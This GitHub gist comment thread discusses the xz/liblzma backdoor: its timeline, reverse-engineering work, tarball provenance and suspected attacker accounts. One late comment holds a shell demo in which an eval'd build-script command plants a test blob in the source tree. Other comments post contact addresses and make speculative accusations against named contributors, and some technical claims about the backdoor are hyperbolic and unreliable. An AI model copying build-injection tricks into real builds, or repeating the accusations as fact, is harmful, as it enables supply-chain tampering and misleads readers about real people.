"weird" includes "opened 2900 Github issues/MRs in the past 5 years", so when the accuser found a case where "a 2nd account comes in and asks for the feature" 3 months later there's no surprise that this has happened somewhere.

It would be good if everyone here refrains from participating in a witch hunt based on anonymous smearing.

@donington
Copy link

As much as I have loved the discussions brought up in this thread, I would like to see it become more centered on the task at hand - the xz code situation. Everything that people have been mentioning is interesting, but a lot of it has lost focus on the task here.

I'd like to try to submit as fact that sshd was targeted. Not because it provided weakness directly. The sideline was from an outside code base, mostly patched in. The flaw was partially how it was a network service that provided an in - the listening socket.

@christoofar
Copy link

There is so much fan-boyism going on here that you will never get a consensus that all systems without systemd couldn't possibly have this problem.

I'm not trying to "defend the BSDs" here. So don't look at it that way. Again, there's not a realistic magic thing that will stop unwanted hotloading, not even over at the "secure" OSes.

xz has taught me to get more bitchy about hotloading that I don't like. I feel that anyone sassing someone for asking "Why did you bring that in?" whether it's a FOSS discussion or at work, etc... the dev themselves are a red flag. Just explain why you brought the dep in and if you see the "ugh.. maybe a security concern?", then do the research. Look and see. Stop being a jerk.

Trying to play this unitary blame game thing is going nowhere, so we meet here.

The fact that tests were done on an compromised system with all the necessary conditions/ingredients, but sshd was started manually and no backdoor was found seems to have gone over everyone's head.

On the RE chats/discords the resistance the .o has to observing it and a great find that endbr calls are really being used as tokens to locate the calling points is genius.

(S/O to Stephano for figuring out how the locator works https://smx-smx.github.io/xzre/xzre_8h.html#details)

Meanwhile, everyone is talking xz/lzma, distros are rebuilding packages, but zstd is being built from, or hasn't since 3/29, from a preconfigured github tarball with lzma enabled (or is it not everyone doing this?).

libsystemd also put dlopen() around zstd too. This backdoor is one of the most craftiest things ever to have been written. Every decompiler shop is going to be studying this for months/years. We may need to be thinking of asking the chipset makers themselves for help. No doubt many of them too have also been thinking about this, and worried about their own machines they run.

You wanted automation and less sysadmin work, you looked down at custom scripts to setup services, .. here it came. If you leave honey out the bees and the ants will come.

Amen. Also did you notice OWASP themselves got a breach? https://therecord.media/owasp-foundation-warns-of-data-breach-resumes

@thesamesam
Copy link
Author

Can we please keep the comments here focused on edits to the gist, new resources, and new developments? There are places for general discussion of the vulnerability but I need to keep the comments section not completely polluted so I don't miss important suggestions/edits/changes. Thanks.

@christoofar
Copy link

christoofar commented Apr 5, 2024

Can we please keep the comments here focused on edits to the gist, new resources, and new developments? There are places for general discussion of the vulnerability but I need to keep the comments section not completely polluted so I don't miss important suggestions/edits/changes. Thanks.

@thesamesam 10-4.

On the RE effort, I am wondering in the dumpouts that Jia saw from Gentoo/Debian that one of the x86_64 registers was being used as a debug marker.

Force flipping registers (but for Jia, its going to be in an obfuscated way) is a common technique in old assembly programming, back when computers had big light boards and a STOP/RUN switch somewhere where you could inspect values by hand, we all know. Focus has been so much on hunting down all the symbols, but now I think valgrind with the full register dump turned on across a bunch of projects that screamed in 5.6.0 might reveal something that's been missed. I'm off to go work on that and shut up on here :-)

@Leseratte10
Copy link

I don't think there's currently any hints that the malware itself is doing that - but if you had the SSH port exposed it's possible that the attacker has abused the malware to get code execution on your machine and could then have installed or changed whatever he wanted, so if you want to be absolutely safe you'd need to reinstall.

@fiorins
Copy link

fiorins commented Apr 5, 2024

Could Github add a check if the tarballs gets created with the code hosted on the platform ?

@AdrianBunk
Copy link

Could Github add a check if the tarballs gets created with the code hosted on the platform ?

Please read the "Design" section in the FAQ where this topic is explained.

(And note that the tiny part of the backdoor that was only in the release tarballs could as well have been in git like the rest of the backdoor - everything in git was also under control of the attacker.)

@rifkidocs
Copy link

just want to leave a trace here

@ZacharyDK
Copy link

How would one even begin to try and break apart the malicious binary? Recommended tool suite?

@AdrianBunk
Copy link

How would one even begin to try and break apart the malicious binary? Recommended tool suite?

Read the links under "Analysis of the payload", where people discuss the payload and how they have analyzed it.

@anzz1
Copy link

anzz1 commented Apr 5, 2024

I really hope that the wakeup call people take from this is that the "move fast and break things" mentality should not apply to kernel nor core utilities. Stability and safety is much more important than new shiny features especially if Linux is to be the stable foundation for server and embedded applications running critical code in the future too. I really hope any people bullying maintainers to accept patches and new features to already perfectly functioning tools will be called out more often. If you desperately want a new feature, fork it and make your own.

I hope that people would understand to look back into what Linux was and what the core idea of it is, which I would describe as a collection of simple utilities (GNU) and the kernel to support them. Not anything else, everything that is complex, hard or time-consuming to audit, new feature that is controversial, should not be included in either the kernel, core utilities or major distros as default. You are not supposed to create these large monoliths like systemd which span their tentacles to the entire system and introduce not only a complex large codebase addition but also a single point of failure.

I also hope that the reflection from this isn't that we need more idiotic "mitigation" security features like AppArmor, position-independent-executables, stack canaries/protectors and such other band-aid "fixes" which create additional complexity that does not only hurt performance but is also fertile ground for new security holes and bugs to fester.

The only sane and safe way is to make the kernel and core utilities simple and lean so they are easy to audit, lift your foot from the pedal a bit so everything can be checked at least with several sets of eyes before moving forward. There is no need for any "mitigations" when the code itself is safe.

Also the whole community needs to not succumb to any person's or group's vanity who push hard to get their personal pet projects merged into the foundation that everyone uses. As much software as possible should be built on top of Linux, as packages which can be installed like it has always been, not into Linux either in the kernel or as kernel patches included by default in major distributions or packages installed by default. The more "blank slate" a base Linux installation is by default, the better off is everyone is. This is especially true for distributions which are focused on serious use like Debian. Most people and in turn infrastructure they create use major distributions as a base, so the decisions made by major distributions also have a great impact, so not only must the kernel team be vigilant.

If you look at the kernel mailing list, Torvalds has been active in fighting against the tide of many people trying to push all kinds of bullshit into the kernel source tree. But the major distributions to my (limited) knowledge doesn't have such a strong gatekeeper and all the distros are getting increasingly bloated and include more and more unnecessary features by the day. Also Torvalds will eventually retire, what will happen then, who will fight against the tide? That not also makes me scared for the future of Linux, but also shows that it's not a good idea to rely on a single gatekeeper to keep all the bullshit out. I mean over a decade ago, there was a serious push to move the linux kernel to use C++, which Torvalds promptly stopped in its tracks, thank god. Where would we be without people pushing back and wanting to contemplate first? We need more of those people as maintainers in the OSS community, the critical thinkers and slow and steady types.

How could the OSS community at large have the reflection when it comes to critical foundations that everything needs to be handled with proper care, which means taking your time, and not every feature needs to make it in just because it's new and shiny? The problem at large is that the group who want "feature X" to be added are usually loud and obnoxious and push hard while most people who think "is this really necessary" will not either out of politeness say anything or do not care enough. Then even when maintainers think so, it's easy to have the psychological effect of "oh, this must then be what people really need" and get bullied to merge a new feature in without proper checks and balances. Rinse and repeat a hundred times and suddenly the distribution got much more bloated and harder to audit since a hundred new features were added each of which some person might just maybe need sometime has been added as default.

TL;DR; Everyone who is a developer in any critical software work like kernel, core utilities, major distributions of Linux, etc., take your time. The world will not end if a new feature doesn't get added in tomorrow. It just might though if you add something in a hurry. You don't owe anyone anything, especially not someone bugging you to immediately add a "feature X" because some small subset of users might want to use it.

@Z-nonymous
Copy link

Z-nonymous commented Apr 5, 2024

Wait until snaps and flatpaks are properly exploited. 😂

@Aqa-Ib
Copy link

Aqa-Ib commented Apr 5, 2024

Well said anzz1. You even can extrapolate what you said to everything that human society do. It is practically impossible to stop this crazy development that we have as a whole. However, those individuals who make things carefully can be of great value for our future.

@Daniel15
Copy link

Daniel15 commented Apr 5, 2024

Could Github add a check if the tarballs gets created with the code hosted on the platform ?

GitHub already has built-in support for generating tarballs based on a tag (for example, https://github.com/Daniel15/prometheus-net.SystemMetrics/archive/refs/tags/v3.1.0.tar.gz). This is guaranteed to match the code in source control.

The issue is that sometimes the tarballs legitimately differ from the repo contents, particularly if the project uses automake. However, this is not ideal, and projects should strive to have reproducible builds, meaning the code to build the project is exactly the same as the code checked in to source control, and building the code from source always produces the same binary (so anyone can build the project from source to verify that a precompiled executable was built from the same source code, as it'll be exactly identical). One of the more common issues with achieving reproducible builds is timestamps, for example if the current build time is embedded in the executable.

Having said that, as others have mentioned, that wouldn't have helped here. The attacker was in full control of the source control repo, and could have just put everything in there rather than just in the tarball.

@Daniel15
Copy link

Daniel15 commented Apr 5, 2024

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

@bogd IPv6 does help though. Most good hosting providers will give you at least a /64 range per server for IPv6 (the great ones will give you a /56), and you can run your SSH server on a random IP in the middle of the range. Just stick the IP in an internal-only DNS zone and don't expose the DNS record publicly. That's far less likely to be found during a scan, compared to IPv4 where the entire public IPv4 range can be scanned in 5-15 minutes (https://github.com/robertdavidgraham/masscan).

Sure, it's security through obscurity and thus isn't a proper security measure, but I've been running a honeypot server in one of my /64 ranges for a few years and so far nobody has hit it. IPv6 traffic to some of my sites is around 45% of total traffic, so people are using IPv6 otherwise 🙂

@ormaaj
Copy link

ormaaj commented Apr 5, 2024

I really hope that the wakeup call people take from this is that the "move fast and break things" mentality should not apply to kernel nor core utilities.

This was caught as early as it was thanks entirely to the abundance of people testing new release code in a wide variety of environments. That is made possible by downstream distributors that integrate test packages into their systems so they are easily available. Testers of upstream prerelease code had no opportunity to find this.

This is the system working exactly as it should.

@fatience
Copy link

fatience commented Apr 6, 2024

Neustradamus's behaviour is indeed suspicious.
https://news.ycombinator.com/item?id=39868682

He seems to push the "plus version" of SCRAM-SHA(3)-512 everywhere, with a lack of motive or proper argumentation other than "they use it as well" (projects he convinced beforehand).

https://bugzilla.mozilla.org/show_bug.cgi?id=1577688 - This seems to be a common response when people want to implement it

Someone more experienced with this should definitely take a look.

@bogd
Copy link

bogd commented Apr 6, 2024

@bogd IPv6 does help though.

No arguments there - it does help, it's just not the panacea that some people think it is :)

Most good hosting providers will give you at least a /64 range per server for IPv6 (the great ones will give you a /56)

There's a very nice conversation here about how allocating 1 trillion times the entire IPv4 address space for a single server is "a good idea" (TM), and I am old enough to remember the days when we allocated an IPv4 /8 for a single network, because "the address space is so large, it is practically infinite". But as I was saying, I do not want to sidetrack this conversation and go into other topics - the original topic is far too important.

Sure, it's security through obscurity and thus isn't a proper security measure

That was my entire original point. Maybe that, plus what others have added:

  • IPv6 would not have protected against an application-level backdoor
  • this attack does not look like something that would be used against random targets, discovered during a "routine" scan. Looks more like something one would save to use against extremely high-value, known targets. I know, assumption, but... not an illogical one.

@AdrianBunk
Copy link

He seems to push the "plus version" of SCRAM-SHA(3)-512 everywhere, with a lack of motive or proper argumentation other than "they use it as well" (projects he convinced beforehand).

You should read the links provided by this person, these are proposals for upcoming internet standards.

https://bugzilla.mozilla.org/show_bug.cgi?id=1577688 - This seems to be a common response when people want to implement it

Mozilla accepted an implementation from someone else that implemented a major part of the original request, this is a strong indication that the request made sense.

please do not respond to closed bugs asking for additional features. Please file a separate bug for new features.

That's a very common mistake, nothing suspicious about that.

behaviour is indeed suspicious.

It can be really harmful when people who clearly have no experience interacting with users in open source projects are making such bold accusations, it happens far too often that a brainless internet mob drives innocent people into suicide.

@thesamesam
Copy link
Author

thesamesam commented Apr 6, 2024

I am familiar with that person (I don't know him) and my take has always been that he's enthusiastic but ends up irritating a lot of people (me included) because of how he goes about things. I don't think he's malicious, just ends up causing hassle for FOSS maintainers. This situation is cause to pause and reflect on behaviour but I don't think people should be chasing after him.

@Chestnuts4
Copy link

Chestnuts4 commented Apr 6, 2024

Sorry, I want to know how can I get xz.5.6.1.tar.gz, then I can diff it as same as you

git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4

@Chestnuts4
Copy link

xz-5.6.1

which place can I download former build-to-host.md, I get xz-5.6.1.tar.gz from github

@thesamesam
Copy link
Author

thesamesam commented Apr 6, 2024

@Chestnuts4 Hi. Are you looking for the safe/original/non-tampered version of build-to-host.m4? You can get this from gnulib. It might be in /usr/share/aclocal on your system if you have recent gettext installed too.

@Chestnuts4
Copy link

@thesamesam thanks for you reply, I got original build-to-host.m4 from github, and success diff it

@ivq
Copy link

ivq commented Apr 7, 2024

I sent the initial versions of the RISC-V filter to Lasse last year and quit the development afterwards, that's why I was
acknowledged in the library code. If only I had CCed the mailing list.

Why push the RISC-V filter and new version of lzma?
(1) Bouffalo Lab has a series of RISC-V SoCs, See Products
(2) They are using lzma Python module in their flash tool to generate OTA images, See BLDevCube using lzma.
(3) The lzma BCJ filters can improve compression ratio
(4) Compression ratio matters, saved flash size is profit
(5) If Python has upstream support for RISC-V filters, they do not need to bother maintaining binary shit like
the used genromfs tool, See BLDevCube calling bundled genromfs binary
(6) They may also use lzma in other languages, thus the push on xz-embedded and Rust binding library.

About the name
I chose Chien Wong simply because I like it and dislike Pinyin. Pinyin does not suggest correct pronunciation
to non-mandarin speakers.

About the ongoing CPython PR binary test file
The reason I chose them is easy: why not use upstream test vectors if upstream has them?
However, it turns out that the choice was arbitrary and wrong.

My advice is to write to Bouffalo Lab for confirmation.

I have updated my profile to show organizations. I'd hide it any time if I like.

He also committed a several changes to Wireshark in 2022 and 2023, it looks like several commits for wireshark's wifi 802.11 handling, to meet the spec more accurately, to add a new capability to it for ipv6, and to fix a bug. I'm not a 802.11 expert, but the code doesn't look unsafe at a cursory glance for the most part.

There's some rework in this commit to address A-MSDU dissecting that is addressing the padding for the last packet. This seems plausible to me, but again, I don't know enough about 802.11.

Thank you for reviewing the commits I've made!

In my personal opinion,based on the current evidence of long-term lurking and preparation,it can be inferred that this individual has motives and plans,thinks clearly and cautiously,and the information related to their background and daily routine may be distorted or manipulated。Any records left behind could potentially be intentional。

不要见着风,是得雨。

@redcode
Copy link

redcode commented Apr 7, 2024

Thank you very much for clarifying the situation @ivq. Can you tell us anything about Jia Tan? I mean, did you talk in Chinese or can you deduce anything about him based on private conversation or emails if there were any?

From what you say, I understand that you had no direct communication with Jia Tan at any time.

@RufusExE
Copy link

RufusExE commented Apr 8, 2024

不要见着风,是得雨。

只是从渗透的角度去看的,所有可能都分析过,首先,明明英文名更容易让人难定位和分析,实质他选择推动事情进展的几个帮凶就是英文名角色,但是选了一个明显符合政治取向并更好定位群体的人群,并且还留了在名字中间使用了一个拼音级的中西结合的马脚(这个操作很诡异,专业和不专业混杂在一起),然后还有一个看似失误的代理IP跳转,从手法角度,他可以伪装一次,就可以伪装多次,从技术角度,他的技术水平应该没啥争议的,我感觉还是当做一个极其专业的个人或者团队的演练或者尝试会比较好

@ivq
Copy link

ivq commented Apr 8, 2024

Thank you very much for clarifying the situation @ivq. Can you tell us anything about Jia Tan? I mean, did you talk in Chinese or can you deduce anything about him based on private conversation or emails if there were any?

From what you say, I understand that you had no direct communication with Jia Tan at any time.

No, we never talked in Chinese. There were only a few e-mails then and I did not find any useful information regarding social engineering.

@ramizpolic
Copy link

This seems to me more like a team rather than individual effort.

@schkwve
Copy link

schkwve commented Apr 8, 2024

I've been out of this discussion for a while; has anything interesting been said in this discussion (that has not been mentioned in the gist)?

@roccotanica1234
Copy link

I don't know if it's relevant, but it appears that Hans Jansen has an account on proton.me (hansjansen162@proton.me), with the Outlook address (hansjansen162@outlook.com) set up as the recovery email.

@AdrianBunk
Copy link

@thesamesam Regarding "Solar Designer suggested this may have caused", this might be disproved by 5.6.0 being released and in Debian before the MR:
https://tracker.debian.org/pkg/xz-utils
systemd/systemd#31550

The Debian Import Freeze for Ubuntu LTS on February 29 is something I would consider more likely for the timing of the 5.6.0 release:
https://discourse.ubuntu.com/t/noble-numbat-release-schedule/35649

The next chance of getting the backdoor into an Ubuntu LTS would have been 2026, releasing in February for getting millions of backdoored production machines around the world in May would be a logical plan.

@thesamesam
Copy link
Author

@AdrianBunk Ah, thanks! I remember being subscribed to the systemd PR before all of this and I think that meant I assumed it was older than it was, so I figured the timelines made sense. I'll make those corrections in a minute.

@thesamesam
Copy link
Author

@AdrianBunk Can you check out what I've written now? There's some nuance in it. I think you're right that this makes the theory rather unlikely, although it's interesting that it was first brought up in January.

@AdrianBunk
Copy link

@thesamesam Some thoughts on that:

The "a systemd developer suggested extending the approach to compression libraries" comment was 2 days after the release of 5.6.0, more relevant would be systemd/systemd#31131 (comment)

The timing of 5.6.0 is a good fit for getting into Ubuntu LTS, and that could explain the timing no matter what happened at systemd.

Lennart and Andres are both working at Microsoft, even the reverse direction that some government agency had advance knowledge of the planned backdoor and nudged people in the right direction cannot be ruled out.

@thesamesam
Copy link
Author

thesamesam commented Apr 8, 2024

From my own participation in discussions on IRC, the plan was absolutely to be in the next Ubuntu LTS, btw. Jia pushed for an accelerated release schedule to make it in.

@thesamesam
Copy link
Author

thesamesam commented Apr 8, 2024

@AdrianBunk Many thanks again. I'll try to find somewhere to mention the Ubuntu LTS thing, given it was absolutely true - even if I can't speak to motive. I'd prefer to mention it outside of the systemd thing given that part is getting a bit big and it's not strictly relevant to that, but I am happy to hear dissenting opinions.

@the-lne
Copy link

the-lne commented Apr 9, 2024

Obviously someone would look into performance inconsistencies on an opensource tool of all things. That's like selling a sick dog to a veterinarian. What we did is catch the lowest hanging fruit. There probably are more out there in even more critical tools that we will never know about because who doesn't have something to gain from that. This isn't news, it's writing on the wall and a warning to be a little less trustful. Imagine if he actually knew what he was doing, or what a team of sponsored professionals could do. Hopefully future commits are held to a higher standard on critical applications.

@AdrianBunk
Copy link

@thesamesam Regarding "Checking other projects for similar injection mechanisms", Debian has an online search engine that provides literal and regex searches over up-to-date sources of the 38k packages in Debian unstable like:
https://codesearch.debian.net/search?q=grep+-aErls&literal=1
https://codesearch.debian.net/search?q=Automake+1.10a&literal=1

I checked interesting strings from the manipulated build-to-host.m4, and there was nothing that looked suspicious to me.

@felipec
Copy link

felipec commented Apr 10, 2024

This one is really complete: The xz attack shell script, it shouldn't be "other".

@christoofar
Copy link

christoofar commented Apr 10, 2024

I sent the initial versions of the RISC-V filter to Lasse last year and quit the development afterwards, that's why I was acknowledged in the library code. If only I had CCed the mailing list.

Why push the RISC-V filter and new version of lzma? (1) Bouffalo Lab has a series of RISC-V SoCs, See Products (2) They are using lzma Python module in their flash tool to generate OTA images, See BLDevCube using lzma. (3) The lzma BCJ filters can improve compression ratio (4) Compression ratio matters, saved flash size is profit (5) If Python has upstream support for RISC-V filters, they do not need to bother maintaining binary shit like the used genromfs tool, See BLDevCube calling bundled genromfs binary (6) They may also use lzma in other languages, thus the push on xz-embedded and Rust binding library.

About the name I chose Chien Wong simply because I like it and dislike Pinyin. Pinyin does not suggest correct pronunciation to non-mandarin speakers.

About the ongoing CPython PR binary test file The reason I chose them is easy: why not use upstream test vectors if upstream has them? However, it turns out that the choice was arbitrary and wrong.

My advice is to write to Bouffalo Lab for confirmation.

I have updated my profile to show organizations. I'd hide it any time if I like.

He also committed a several changes to Wireshark in 2022 and 2023, it looks like several commits for wireshark's wifi 802.11 handling, to meet the spec more accurately, to add a new capability to it for ipv6, and to fix a bug. I'm not a 802.11 expert, but the code doesn't look unsafe at a cursory glance for the most part.
There's some rework in this commit to address A-MSDU dissecting that is addressing the padding for the last packet. This seems plausible to me, but again, I don't know enough about 802.11.

Thank you for reviewing the commits I've made!

In my personal opinion,based on the current evidence of long-term lurking and preparation,it can be inferred that this individual has motives and plans,thinks clearly and cautiously,and the information related to their background and daily routine may be distorted or manipulated。Any records left behind could potentially be intentional。

不要见着风,是得雨。

The filter flag changes made to xz have been run down (S/O to https://github.com/smx-smx/xzre for assembling the best puzzle piece reconstruct https://smx-smx.github.io/xzre/globals.html) allowing so many more people to jump into disassemblers to figure out this puzzle.

Note: People keep saying (wrongly) that sshd is compromised. There's always room for improvement in anything. sshd is not how this nasty thing gets on a machine. It does exploit both systemd and ld in concert so that when systemd launches a fork(), it grabs a hold of ld for its audit hook and reads through the rest of the load. From there it can replace any function in memory that it wants.

It's a hotloader delivery platform that can target any process in Linux. The entire memory of the computer is its oyster.

All that work you made hashing credit card digits info before storing them in db2? Who cares, liblzma.so if the creators want, can kick a new variant on to your host and read it.

The data types used to support the flags is how the backdoor finds a way to maintain state in memory and not be seen. The RISCV option added to lzma was done in the publicly visible code, and the refactor of lzma, to hide small adjustments that allow nasty structures like lzma_vdi but other data structures in lzma to be used to hold areas in memory, use x64 dasm against areas of the entire process space including everything systemd manages, copies out and replaces what should have been static code set to ro, it hijacks ld way earlier that thought (and it hijacks itself), so all the data structures in liblzma.so can be used to hold hard things to construct, like function tables scanning both the ABI and LD_AUDIT to verify its work, and push that into its own reserved areas and escape observation.

Why don't you show us some proofs @ivq that the changes you wanted into CPython would give you a performance boost? Did you verify that on your own testbed? How about you post your results, here.

image

So, that 5.6.0 to 5.6.1 update Jia Tan put out? RE effort exposed the loading/init pathway where the code is trying to erase what's probably an examine tool (my theory), which is another hotloaded side-car that they use locally to debug and keep track of the integration as they continue to layer more techniques to thwart analysis. How does that happen? Well, the crash from valgrind came from the microlzma function.

Talking out the ASM by hand the RE team learned that it was not nuking in its own stack area. It was trying to erase an adjacent stack area. Because liblzma.so can walk the ELF and the memory space to find the offsets for the calls it wants to use, this indicates that there's more than one build process:

  • The one we see in the distros
  • Another one baking the toxic .o injectors

A mismatch in feature flags running the build for the injectors is why Jia had to hustle, because Jia (who's really a whole team of people) did not know that valgrind is run before some OSS developers releases.

Full report on the top-level symbol differences between the .0 and .1 crc_64 injectors are here:
https://jiatanfunctions.tiiny.site/

@DaLynxx
Copy link

DaLynxx commented Apr 10, 2024

xz @ github is available again. https://github.com/tukaani-project

@christoofar
Copy link

christoofar commented Apr 10, 2024

Right now @ivq I don't believe your word salad without showing some RISCV proofs against a direct invocation of 5.6.0 or 5.6.1

Pull out your RISCV board and do a time test and post it here, then.

Anyway... both the encoder initter and decoder initter got this harmless looking adjustment that, in the decoder, is not used at all and is only meant by Lasse to report out completed results of decompression. But with the right compile options it survives being removed. Since the filter options themselves are a travel point every point in code, guess where the pointers to the backdoor go?

The harmless looking filter flags update are critical to activating the backdoor, there's so many data structures to hijack inside lzma; some so handy that simpler types without promoting them into pointers is not needed. You essentially have your own database.

Which is what lzma_vli probably will be promoted to someday in a server hotpatch, who the hell knows.

image

@DaLynxx
Copy link

DaLynxx commented Apr 10, 2024

Also https://xz.tukaani.org/xz-utils/ no longer responds. (affects link under chapter 'Background')

@christoofar
Copy link

christoofar commented Apr 10, 2024

Most HLL programmers are just gonna go "huh?" because they cannot understand the concept in their minds that when you leave an area of memory loaded with your porn stash without wiping it and just zero the pointer out, your porn history table still sits there in RAM.

Now Jia can read it.

There's still no idea how much is left to find. I'm reliving my Compaq Deskpro 8086 days which was the last time I wrote asm, I don't know a thing about x64 asm beyond just the register sizes and effects (and some of the original x86 opcodes), there is so much more to discover.

liblzma.so is both a nightmare, and a masterpiece of layered integration. And the thing is fucking evil.

Fucking. Evil.

P.P.S.: All the credit to everyone helping out on the re. I'm not a security huckster and shilling corps with CBT videos. I have done integrations of weird shit to normal shit my whole career, and pulling out and sussing through crashdumps, register readouts, logs and any other evidence I can get my hands on when I get stuck and have to produce the normie-version of events and developers are trying to throw shit over the wall back on to developers who have no control on their side of the fence have solid ammo to fire back with. "They broke our shit" is what gets me going.

When I'm coming for you with a diff report, run.

@christoofar
Copy link

christoofar commented Apr 10, 2024

Oh, cool bin trick from fiddling with game roms:

compact a bin (gz will do in many cases, not all but most). You can spot where data goes and where code goes when the compaction removes away all the 00 FF patterns left around for initializers. It only works for empties, but in corpland and especially in C++ there's monster data structures that compact to almost nothing.

In Jia Tan's case, the function delete reorders everything that survived, resulting in a byte slide that picks up well on the radar.

You already have a bindiff analyzer on your box. It's in emacs (the other malware you can get from the distros). It's a neat trick when a vendor sends something and I need a clue of how "big" their changes were, generally-speaking, they keep 9 layers of mis-management away from me and the other team actually doing the work, and to sense when they aren't talking but the bins they're walking indicate they're doing a refactor job on the inside.

Jia again:
image

@terokinnunen
Copy link

@Chestnuts4 Hi. Are you looking for the safe/original/non-tampered version of build-to-host.m4? You can get this from gnulib. It might be in /usr/share/aclocal on your system if you have recent gettext installed too.

Thanks, I was puzzled about this too for quite a while. Just an idea - pointer to legit upstream https://git.savannah.gnu.org/gitweb/?p=gnulib.git;a=blob;f=m4/build-to-host.m4;h=f466bdbd84abdf60e8305fa7adc12c74d7f05a8a;hb=HEAD would be helpful clarification here.
(Probably the TODO item "Explain dist tarballs" will cover this later (?), but until then, a quick pointer in Design section would clarify a lot.)

@christoofar
Copy link

christoofar commented Apr 10, 2024

🤔

Any particular reason Jia Tan why you nuked this whole area and in its place is the execution path that takes you to the backdoor?

image

image

@rybak
Copy link

rybak commented Apr 10, 2024

FYI, the malicious commits (the in-repository portion of the backdoor) were reverted: e93e13c (Remove the backdoor found in 5.6.0 and 5.6.1 (CVE-2024-3094)., 2024-04-08).

@thesamesam
Copy link
Author

I'll try respond to the above comments which need me to make changes later today. Thanks.

@roccotanica1234
Copy link

Jia Tan's account, associated to jiat0218@gmail.com on Twitter is: https://twitter.com/JiaT03868010 (I haven't find it mentioned anywhere)

@flybyray
Copy link

What is "this"? xz_wrap was recently changed by Lesse, but the changes are reasonable and do not introduce any new eval; the options are consistent with manpage recommendations. The Makefiles were recently changed for version and other reasons, not much to do with xz.

cmd_xzkern = cat $(real-prereqs) | sh $(srctree)/scripts/xz_wrap.sh > $@

ref: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/Makefile.lib?h=next-20240328#n528

which is quite different from all other compression tools.
Because it does not pipe directly into the xz tool. it uses an additional process sh in the hiarchy. sh provides additional insight via environment variables for child processes.
The whole thing has nothing to do with stripped down xz decompression code within the kernel.
The call goes into what is packaged in the kernel build environment for $XZ.

eval "$($XZ --robot --version)" || exit

ref: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/xz_wrap.sh?h=next-20240328#n36

When you follow @christoofar lookups you may notice that $XZ might work differently when it detects specific things.
$XZ for sure is linked to liblzma.so.

@Artoria2e5
Copy link

And my dear Ray, there’s already a NON-MALICIOUS EXPLANATION as to why an sh is used: it turns on the bcj flags.

@flybyray
Copy link

And my dear Ray, there’s already a NON-MALICIOUS EXPLANATION as to why an sh is used: it turns on the bcj flags.

Better safe than sorry. Ask yourself what a NON-*-EXPLANATION is worth. Especially an explanation which is at all wrong - shows just that supplier has no experience.

@Artoria2e5
Copy link

Artoria2e5 commented Apr 12, 2024

sh provides additional insight via environment variables for child processes.

It also does not, because the shell script in question does not export anything new to the environment. The shell only changes envp in three circumstances:

  • when a new variable is explicitly added to envp via "export" or "declare -x"
  • when a variable is explicitly de-exported, say by running declare +x
  • when an already-exported variable, such as PATH, is changed or unset

Otherwise every variable change stays local to the shell process.

The only additional "insight" is just the well-documented BCJ and lzma alignment parameters.

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

@paulfloyd
Copy link

paulfloyd commented Apr 12, 2024

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

@flybyray
Copy link

flybyray commented Apr 12, 2024

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

Polite as you are, you used " maybe". Politeness won't help you against a criminal hacker's ideas. The experiences of doubters are often worth more than those of so-called fact-checkers.

because the shell script in question does not export anything new to the environment

if you waited patiently after reading carefully until you really understood what you had read, without ignoring the meaning of the words, you could avoid misinterpretations and make fewer inference errors.
I wrote "insight via environment variables for CHILD processes". How dare are you that you then talk about "does not export anything new to the environment"? I wish you would rather fantasize about the similarity between eval and evil.

have you really understood only some of the attack patterns that have already been discussed here? because of course the attackers in a build process don't care about changing the environment! just think about how many places environment variables could appear in logs and the hide-and-seek game would end immediately. I would recommend to you, that you inspect some public build servers and their artifacts and detailed outputs of builds.

The trick is to leave artifacts in the right places as inconspicuously as possible during the build process.

But I'm not giving up on you yet. Let's start by making the bold printed a little clearer.
The following should only use the fragments highlighted in the leading comment as a sample. I didn't develop xz, so I'm replacing it with sh. I can't use the --robot --version arguments, but they are almost irrelevant.

# this is only pretext normally provided by the task to build the kernel
TEMPDIR="$(mktemp -du)"
mkdir -p $TEMPDIR/Artoria2e5/mykernel/scripts
mkdir -p $TEMPDIR/Artoria2e5/mykernel/prereqs
srctree=$TEMPDIR/Artoria2e5/mykernel
pre_reqs="$TEMPDIR/Artoria2e5/mykernel/prereqs/a.txt"
XZ=sh
export XZ
echo please cleanup $TEMPDIR when you are done
cat >"$TEMPDIR/Artoria2e5/mykernel/prereqs/a.txt"<<'EOF'
lorem ipsum and some intersting pointers to CANCER
EOF
cat >"$TEMPDIR/Artoria2e5/mykernel/scripts/xz_wrap.sh"<<'EOF'
eval "$($XZ -c 'TARGET_DIR='$(dirname ${BASH_SOURCE[0]})/..';echo STEVE_S_LATE_REVENGE_FOR_LINUX="$(grep -Po '\''pointers to \K\S+'\'')";echo $'\''X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\''> ${TARGET_DIR}/blob.txt')" || exit
#this is just to make it easier to understand the above XZ command would be able to produce this too
echo a $STEVE_S_LATE_REVENGE_FOR_LINUX that attaches itself in an intellectual property sense to everything it touches
EOF

# now we are going to "build the kernel" - show casing just relevant maybe malicious part
# original 'cmd_xzkern = cat $(real-prereqs) | sh $(srctree)/scripts/xz_wrap.sh > $@' 
cat ${pre_reqs} | sh ${srctree}/scripts/xz_wrap.sh > a_message_to_the_linux_people.txt
# finished nothing special to see

# verify that the build context was modified
cat a_message_to_the_linux_people.txt
find $TEMPDIR -type f -name blob.txt -exec cat {} \;

# cleanup
rm -rvf $TEMPDIR

unfortunately, based on your reading comprehension, i have to assume that you still won't understand. but maybe there are a few others who can help you further.
The verify step would show you

  • 'cat a_message_to_the_linux_people.txt'
a CANCER that attaches itself in an intellectual property sense to everything it touches
  • 'find $TEMPDIR -type f -name blob.txt -exec cat {} ;' # a nice blob placed into srctree
